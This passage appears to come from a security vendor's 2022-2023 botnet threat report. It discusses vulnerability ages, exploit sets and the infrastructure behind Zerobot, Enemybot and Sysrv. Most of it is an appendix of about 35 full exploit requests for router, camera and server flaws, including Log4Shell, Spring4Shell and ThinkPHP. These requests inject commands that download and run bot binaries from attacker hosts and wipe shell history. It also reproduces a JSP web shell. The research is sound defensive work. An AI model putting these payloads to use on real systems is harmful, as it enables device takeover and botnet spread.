Here you can see the vulnerability distribution by disclosure year in the 2021 botnet report. Data from 2021 botnet report: count of vulnerabilities disclosed by year: two in 2021 and 2020, none in 2019, 3 in 2018, 5 in 2017, 3 in 2016, 1 in 2015, 3 in 2014, 1 in 2013 And here is how they look in this year’s research. Data from 2022-2023 botnet report: count of vulnerabilities disclosed by year: 11 in 2022, 10 in 10, 8 in 2020, none in 2019, 5 in 2018, 4 in 2017, 7 in 2016, 1 in 2015, 5 in 2014, 3 in 2013, 1 in 2007 In 2021, just 20% of vulnerabilities we discovered had been disclosed in the preceding two years. Now, we see a significant shift where newer vulnerabilities are used almost twice as often – 38% were disclosed in the last two years. Another important factor is the ratio of binaries that contain newer vulnerabilities to the rest. In 2021, this was 61 to 160 binaries, and this year it is 57 to 1,628. So even though there are proportionally more newer vulnerabilities being exploited, they appear in a much smaller ratio compared to 2021.  There is also a new record for the oldest vulnerability present in the malware, which is CVE-2007-3010. It affects the Unified Maintenance Tool in the Alcatel OmniPCX Enterprise Communication Server. By running the web interface‘s ‘masterCGIscript with the ‘ping’ and ‘user’ parameters, a user can ping any IP address reachable from the server. However, the value of the ‘user’ parameter is not sanitized, and is processed by a shell, so it can be exploited to run arbitrary commands on the system. You can learn more about the vulnerability here. While the affected software platform is an enterprise solution, and this sector tends to be on the slower side of replacing tried and tested technology, the linked advisory from 2007 says that correct filtering of shell meta-characters and tighter access control have been implemented in all supported versions“, so there shouldn’t be too many vulnerable systems in the wild.  Exploit for CVE-2007-3010 taken from [11]

GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://45.66.230.47/bins/wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}selfrep.alcatel; HTTP/1.1 Host: %s Accept: */* Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Hello World

Sets of Exploits

Binaries use different numbers of exploits. In contrast to our findings from 2021 when 83% of malware used two or more exploits, this year only around 40% used more than a single exploit. Here’s how the overall distribution looks by the number of exploits used. Over 60% of botnets use 1 exploit, 13.6% use 3 exploits, 11.3% use 2 exploits, 4.9% use 6 exploits, 1.9% use 4 exploits, 1.66% use 5 exploits, 1.66% use 22 exploits. The rest use 9, 11, 12, 13, 14, 15, 18 exploits

What is an exploit set?

An exploit set is a list of all the exploits that a specific malicious binary uses for propagation or other purposes. This year, we discovered 36 different exploit sets in use. Although only five out of 36 sets use a single exploit, 60% (1,017 binaries) had one of these five exploit sets. CVE-2017-17125, the most often exploited vulnerability, was present in 28 of the 36 exploit sets, moreover, the most popular exploit set used by 987 binaries targets this vulnerability only. The largest exploit set contained 22 exploits and was solely used by Zerobot. Another interesting fact is that only six sets contained exploits for recently disclosed vulnerabilities (i.e., within the last two years before the report) but four of them had around 50% or more of their exploits targeting such vulnerabilities. In general, exploit-containing malware can be divided into two groups:

  1. Binaries that equip exploit sets with mostly old, and well-known vulnerabilities 
  2. Binaries with mostly new vulnerabilities in their exploit sets. 

The overwhelming majority of the binaries we’ve seen belong to the first group. The second group is smaller and innovates in the sense that their operators track fresh vulnerabilities and don’t waste much time implementing exploits for those vulnerabilities into their botnet source code.  Here is a list of those four exploit sets and malware that uses them:

Exploits in the set Observed URL Information on the botnet Filehash
CVE-2021-4034 hxxp://5.2.72[.]244/ xms/su?grep Malware written in Go. IP address belongs to AS 60404 (Netherlands) managed by The Infrastructure Group B.V. [9]
CVE-2017-5638, CVE-2022-22947 hxxp://194.145.227[.]21/ sys.x86_64 A Sysrv botnet instance written in Go. IP address belongs to AS 48693 (Ukraine) managed by Rices Privately owned enterprise. [10]
Netgear “setup.cgi” RCE, CVE-2014-9118, CVE-2015-2051, CVE-2016-6277, CVE-2017-18368, CVE-2018-10823, CVE-2020-17456, CVE-2021-4039, CVE-2021-44228, Adobe ColdFusion 11 JNDI attack, CVE-2022-22947, CVE-2022-25075, CVE-2022-29013 hxxp://80.94.92[.]38/ folder/enemybot[arm, sh4, x86, …] Enemybot. IP address belongs to AS 47890 (United Kingdom) managed by Unmanaged Ltd. The specific IP has a geolocation in Romania. [7]
CVE-2014-8361, CVE-2016-20017, CVE-2017-17215, CVE-2018-10561, CVE-2018-20057, CVE-2020-10987, CVE-2020-25506, CVE-2020-7209,PHP 8.1.0-dev RCE, CVE-2021-35395, CVE-2021-36260, CVE-2021-41773, CVE-2021-42013, CVE-2021-46422, CVE-2022-1388, CVE-2022-22965, CVE-2022-25075, CVE-2022-26186, CVE-2022-26210, CVE-2022-30525, CVE-2022-34538, CVE-2022-37061 hxxp://zero.sudolite[.]ml/ bins/zero.[arm, mips, ppc64, …] Zerobot written in Go. The IP address is 176.65.137[.]5, which has a geolocation in Germany and a messy background. It seemingly belongs to no AS, the network looks to be operated by ZeXoTeK IT-Services GmbH with a really outdated and poorly maintained website, and another hosting company with little to no public information available also appears in the name of Elsmery Hosting with an abuse email address and a postal address in Egypt. [5]

How CUJO AI Protects Internet Users Against Botnets

CUJO AI has developed Sentry, a leading AI-driven cybersecurity solution that protects every device on a network from various threats, including botnets. Sentry is a multi-layered machine learning network security solution that network service providers use to protect their end-users (i.e., ISP customers). It detects and blocks threats directed at any device connected to the network, while respecting the privacy of the end-users. Once deployed on any broadband router, CUJO AI Sentry requires no additional software to secure any and all computers, phones or IoT devices in the home. Sentry can also be deployed on the carrier’s native app to provide full protection to mobile devices outside the home network. Sentry is a proven solution that already protects tens of millions of homes around the world. For more information, visit our ISP security hub.

Exploits Taken from Malware for Vulnerabilities That Were Not Discussed Separately

1. CVE-2016-20016 [1]

GET /shell?cd+/tmp;wget+http://astrxscan.chxv8ybuh2ytmfvfwrulcdqtywlooiybaevwsa2b.org/1x57G5FGH4/0xC4TN3T-590.arm7+-O+p2d;+chmod+777+p2d;./p2d+jaws HTTP/1.1 User-Agent: Hello, pee Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive

2. CVE-2014-8361 [2]

POST /picsdesc.xml HTTP/1.1 Host: %s:52869 Content-Length: 630 Accept-Encoding: gzip, deflate SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping Accept: */* User-Agent: Hello, World Connection: keep-alive

<?xml version="1.0" ?><s:Envelope xmlns_s="http://schemas.xmlsoap.org/soap/envelope/" s_encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns_u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var/;rm -rf msbin;wget http://194.87.71.134/log19/log19.mips -O msbin;chmod 777 msbin;./msbin realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>

3. CVE-2017-18368 [3]

POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: MtmKilledYou Content-Length: 176 Content-Type: application/x-www-form-urlencoded

remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://208.67.107.247/idk/home.arm7;chmod+777+home.arm7;./home.arm7;rm+-rf+home.arm7%3b%23&remoteSubmit=Save

4. CVE-2018-20062 [3]

GET /index.php?s=/index/ hink pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://208.67.107.247/idk/home.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Tsunami/2.0

5. Linksys ‘tmUnblock.cgi’ RCE [4]

POST /tmUnblock.cgi HTTP/1.1 Host: 127.0.0.1:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded

ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mipsel%3B+wget+http%3A%2F%2F185.225.73.210%2Fmipsel%3B+chmod+777+mipsel%3B+.%2Fmipsel+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

6. CVE-2016-6277 [2]

GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://194.87.71.134/ohshit.sh;${IFS}sh${IFS}/var/tmp/ohshit.sh

7. CCTV/DVR “language/Swedish” RCE [2]

GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://194.87.71.134/ohshit.sh;chmod${IFS}777${IFS}ohshit.sh;sh${IFS}/tmp/ohshit.sh&>r&&tar${IFS}/string.js HTTP/1.0

8.CVE-2013-7471 [2]

POST /soap.cgi?service=WANIPConn1 HTTP/1.1 Host: %s:49152 Content-Length: 630 Accept-Encoding: gzip, deflate SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping Accept: */* User-Agent: Hello, World Connection: keep-alive

<?xml version="1.0" ?><s:Envelope xmlns_s="http://schemas.xmlsoap.org/soap/envelope/" s_encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns_m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://194.87.71.134/log19/ohshit.sh;sh ohshit.sh`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>

9. CVE-2014-2321 [6]

POST /web_shell_cmd.gch HTTP/1.1 Host: 127.0.0.1 User-Agent: HaxerMen Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 154 Content-Type: application/x-www-form-urlencoded

IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=wget+http%3A%2F%2F185.225.73.210%2Fmips+-O+%2Fvar%2Ftmp%2Finit.norm&CmdAck=

10. CVE-2016-20017 [5] ‘%s’ is replaced by architecture names, like mips.

GET /login.cgi?cli=aa%20aa%27;wget http://zero.sudolite.ml/bins/zero.%s || curl -o http://zero.sudolite.ml/bins/zero.%s || curl -O http://zero.sudolite.ml/bins/zero.%s; history -c; rm ~/.bash_history; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; chmod 755 zero.%s; ./zero.%s%27$ User-Agent: Hakai/2.0 Accept: */* Connection: keep-alive

11.Vacron NVR RCE [2]

GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://194.87.71.134/ohshit.sh;sh+/tmp/ohshit.sh

12. CVE-2020-7209 [5] The respective Go method for this exploit is called CVE-2017-17106, which is a different vulnerability not exploited by Zerobot.

GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=15;echo BEGIN;wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh;echo END; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Connection: close

13.CVE-2022-22965 [5] The first request uses the payload shown below with normal URL encoding – which is also shown at the actual first request. It creates a file called ‘tomcatwar.jsp’ in the target system with the orange part as its content. The attacker can call this file and use it to execute the commands in the “cmd” parameter of the following request.

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

First request:

POST /stupidRumor_war/index User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded Connection: keep-alive suffix: %>// c1: Runtime c2: <% DNT: 1

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

Second request:

GET /stupidRumor_war/tomcatwar.jsp?pwd=j&cmd=wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Connection: keep-alive

14. CVE-2021-36260 [5]

POST /SDK/webLanguage User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Content-Type: text/xml Connection: close

<xml><language>$("wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh")</language></xml>

15. CVE-2021-46422 [5]

GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Connection: close

16. CVE-2022-26186 [5]

POST /cgi-bin/cstecgi.cgi?exportOvpn=&type=user&comand=;wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh;&filetype=sh User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded Connection: close Cookie: SESSION_ID=2:1645507767:2 Upgrade-Insecure-Requests: 1

17. CVE-2022-26210 [5]

POST /cgi-bin/cstecgi.cgi User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Content-Type: application/json Connection: close X-Requested-With: XMLHttpRequest Cookie: SESSION_ID=2:1645507767:2

And the JSON encoded data of:

“topicurl”: “setting/setUpgradeFW”, “Flags”: “1”, “ContentLength”: “1”, “FileName”: “;wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh

18. CVE-2022-34538 [5]

GET /cgi-bin/admin/vca/bia/addacph.cgi?mod&event=a&id=1&pluginname=;wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh;&name=a&evt_id=a User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Connection: close

19. CVE-2022-37061 [5] Uses a random ID value that replaces ‘%d’.

POST /res.php User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Connection: close

action=alarm&id=%d;wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh

20. CVE-2018-20057 [5]

POST /goform/formSysCmd User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded Connection: close

sysCmd=wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh&apply=Apply&submit-url=/syscmd.asp&msg=

21. PHP 8.1.0-dev Backdoor RCE [5]

GET / Accept: */* Content-Type: application/x-www-form-urlencoded Connection: close

zerodiumsystem(“wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh”);

It seems that the normal User-Agent header has this value, not the “User-Agentt”, which is needed by the exploit. 22. CVE-2020-10987 [5]

GET /goform/setUsbUnload/.js?deviceName=A;wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Connection: close

23. CVE-2020-25506 [5]

POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server= `wget http://zero.sudolite.ml/zero.sh || curl -o http://zero.sudolite.ml/zero.sh || curl -O http://zero.sudolite.ml/zero.sh; killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox; history -c; rm ~/.bash_history; chmod 755 zero.sh; /bin/bash zero.sh` User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded Connection: keep-alive

24. CVE-2022-22947 [7] First request:

POST /actuator/gateway/routes/%d HTTP/1.1 Host: %s:%d Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* %s: %s Content-Type: application/json Content-Length: %d

{“id”: “%d”, “filters”: [{“args”: {“name”: “Result”, “value”: “#{newString(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(u0022cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /data || cd /root || cd /; wget http://%s/update.sh -O update.sh; busybox wget http://%s/update.sh -O update.sh; curl http://%s/update.sh -O update.sh; chmod 777 update.sh; ./update.sh; rm -rf update.shu0022).getInputStream()))}”}, “name”: “AddResponseHeader”}], “uri”: “http://example.com”}

Second request:

GET /actuator/gateway/routes/%d HTTP/1.1 Host: %s:%d %s: %s Accept-Encoding: gzip, deflate Accept: */* %s: %s Connection: keep-alive

Third request:

DELETE /actuator/gateway/routes/%d HTTP/1.1 Host: %s:%d %s: %s Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive

25. CVE-2021-44228 [7] This connects to a rogue LDAP server via JNDI, whose address replaces the four ‘%s’ characters in the part of the exploit that’s colored red. The malicious payload is downloaded from there and executed on the targeted system.

GET / HTTP/1.1 Host: %s %s: t(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//%s:1389/t}’) Referer: t(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//%s:1389/t}’) Cookie: t(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//%s:1389/t}’) Authentication: t(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//%s:1389/t}

26. CVE-2022-29013 [7]

POST /ubus/ HTTP/1.1 Host: %s:%d %s: %s Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: %d Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close

{“jsonrpc”:”2.0″,”id”:3,”method”:”call”,”params”:[“30ebdc7dd1f519beb4b2175e9dd8463e”,”file”,”exec”,{“command”:”cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /data || cd /root || cd /; wget http://%s/update.sh -O update.sh; busybox wget http://%s/update.sh -O update.sh; curl http://%s/update.sh -O update.sh; chmod 777 update.sh; ./update.sh; rm -rf update.sh“}]}

27. CVE-2021-4039 [7]

POST /login/login.html HTTP/1.1 Host: %s:%d Content-Length: %d Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://%s:%d Content-Type: application/x-www-form-urlencoded %s: %s Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://IP_address:8081/login/login.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close

myname=ffUfRAgO%%60cd%%20%%2Ftmp%%20%%7C%%7C%%20cd%%20%%2Fhome%%2F%%24USER%%20%%7C%%7C%%20cd%%20%%2Fvar%%2Frun%%20%%7C%%7C%%20cd%%20%%2Fmnt%%20%%7C%%7C%%20cd%%20%%2Fdata%%20%%7C%%7C%%20cd%%20%%2Froot%%20%%7C%%7C%%20cd%%20%%2F%%3B%%20wget%%20http%%3A%%2F%%2F%s%%2Fupdate.sh%%20-O%%20update.sh%%3B%%20busybox%%20wget%%20http%%3A%%2F%%2F%s%%2Fupdate.sh%%20-O%%20update.sh%%3B%%20curl%%20http%%3A%%2F%%2F%s%%2Fupdate.sh%%20-O%%20update.sh%%3B%%20chmod%%20777%%20update.sh%%3B%%20.%%2Fupdate.sh%%3B%%20rm%%20-f%%20update.sh%%60&mypasswd=test&Submit=Login

28. CVE-2014-9118 [7]

GET /zhnping.cmd?&test=ping&sessionKey=&ipAddr=1.1.1.1;/bin/busybox%%20wget%%20http://%s/folder/enemybotmips%%20-O%%20/var/enemy;%%20chmod%%20777%%20/var/enemy;%%20/var/enemy&count=4&length=64 HTTP/1.1 Host: %s:80 %s: %s Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: sv-SE,sv;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://%s:80/diag.html Authorization: Basic dXNlcjp1c2Vy Connection: close Upgrade-Insecure-Requests: 1

29. CVE-2020-17456 [7]

POST /cgi-bin/system_log.cgi HTTP/1.1 Host: %s Content-Length: %d Accept-Encoding: gzip, deflate Accept: */* %s: %s Connection: keep-alive Content-Type: application/x-www-form-urlencoded pingPktSize=56&btnApply=Apply&traceMode=ping&reportIpOnlyCheckbox=on&pingTimeout=30&Command=Diagnostic&T=1646950471018&queriesCnt=3&pingIpAddr=%%3Bcd%%20%%2Ftmp%%20%%7C%%7C%%20cd%%20%%2Fhome%%2F%%24USER%%20%%7C%%7C%%20cd%%20%%2Fvar%%2Frun%%20%%7C%%7C%%20cd%%20%%2Fmnt%%20%%7C%%7C%%20cd%%20%%2Fdata%%20%%7C%%7C%%20cd%%20%%2Froot%%20%%7C%%7C%%20cd%%20%%2F%%3B%%20wget%%20http%%3A%%2F%%2F%s%%2Fupdate.sh%%20-O%%20update.sh%%3B%%20busybox%%20wget%%20http%%3A%%2F%%2F%s%%2Fupdate.sh%%20-O%%20update.sh%%3B%%20curl%%20http%%3A%%2F%%2F%s%%2Fupdate.sh%%20-O%%20update.sh%%3B%%20chmod%%20777%%20update.sh%%3B%%20.%%2Fupdate.sh%%3B%%20rm%%20-f%%20update.sh&logarea=com.cgi&maxTTLCnt=30&pingCount=4&reportIpOnly=

30. CVE-2018-10823 [7]

GET /chkisg.htm%%3FSip%%3D1.1.1.1%%20%%7C%%20cd%%20%%2Ftmp%%20%%7C%%7C%%20cd%%20%%2Fhome%%2F%%24USER%%20%%7C%%7C%%20cd%%20%%2Fvar%%2Frun%%20%%7C%%7C%%20cd%%20%%2Fmnt%%20%%7C%%7C%%20cd%%20%%2Fdata%%20%%7C%%7C%%20cd%%20%%2Froot%%20%%7C%%7C%%20cd%%20%%2F%%3B%%20wget%%20http%%3A%%2F%%2F%s%%2Fupdate.sh%%20-O%%20update.sh%%3B%%20busybox%%20wget%%20http%%3A%%2F%%2F%s%%2Fupdate.sh%%20-O%%20update.sh%%3B%%20curl%%20http%%3A%%2F%%2F%s%%2Fupdate.sh%%20-O%%20update.sh%%3B%%20chmod%%20777%%20update.sh%%3B%%20.%%2Fupdate.sh%%3B%%20rm%%20-f%%20update.sh Host: %s %s: %s Connection: Keep-Alive

31. CVE-2020-10173 [8]

GET /ping.cgi?pingIpAddress=google.fr;cd /tmp; wget http://46.19.141.122/bins/mips; chmod 777 mips; ./mips comtrend.exploit&sessionKey=1039230114’$ HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Hello, World

32. CVE-2014-3206 [11]

GET /backupmgt/localJob.php?session=fail`wget%20-O-%20http%%3A%%2F%%2F45.66.230.47%%2Fwget.sh%%7Csh` HTTP/1.0 Host: %s Accept: */* Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Hello World

33. CVE-2020-8515 [11]

POST /cgi-bin/mainfunction.cgi HTTP/1.1 Host: %s Accept: */* Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Hello World Content-Length: %d

action=login&keyPath=%27%0A%09%2Fbin%2Fsh%24%7BIFS%7D-c%24%7BIFS%7D%27cd%24%7BIFS%7D%2Ftmp%24%7BIFS%7D%26%26%24%7BIFS%7Dbusybox%24%7BIFS%7Dwget%24%7BIFS%7Dhttp%3A%2F%2F45.66.230.47%2Fbins%2Farm7%24%7BIFS%7D%26%26%24%7BIFS%7Dchmod%24%7BIFS%7D777%24%7BIFS%7Darm7%24%7BIFS%7D%26%26%24%7BIFS%7D.%2Farm7%24%7BIFS%7Dselfrep.vigor%24%7BIFS%7D%26%26%24%7BIFS%7Drm%24%7BIFS%7D-rf%24%7BIFS%7Darm7%27%0A%09%27&loginPwd=a&loginUser=a

34. CVE-2020-9054 [11]

GET /adv,/cgi-bin/weblogin.cgi?username=admin%%27%%3Bwget%20http%%3A%%2F%%2F45.66.230.47%%2Fwget.sh%20-O%20-%%20%%7C%%20sh%%20%23+%23&password=asdf HTTP/1.1 Host: %s Accept: */* Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Hello World

35. Avtech RCE via “Search.cgi”, “CloudSetup.cgi” or “adcommand.cgi” pages [13]

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget%20http%3A%2F%2F46.19.141.122%2Favtech%20-O%20jno%3B%20chmod%20777%20jno%3Bsh%20jno%20$ HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Hello, World

36. CVE-2018-17173 [8]

